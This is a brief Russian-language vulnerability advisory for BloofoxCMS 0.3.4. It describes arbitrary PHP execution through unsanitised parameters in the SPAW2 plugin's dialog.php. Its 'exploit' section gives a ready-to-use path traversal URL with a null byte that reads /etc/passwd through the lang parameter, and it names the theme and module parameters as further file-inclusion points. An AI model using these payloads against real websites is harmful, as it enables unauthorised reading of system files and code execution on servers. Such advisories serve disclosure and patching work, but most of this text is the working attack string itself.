Программа: BloofoxCMS 0.3.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в различных параметрах сценарием dialog.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.
Эксплоит:
http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
dialog.php?theme=<lfi>
dialog.php?dialog=foo&module=<lfi>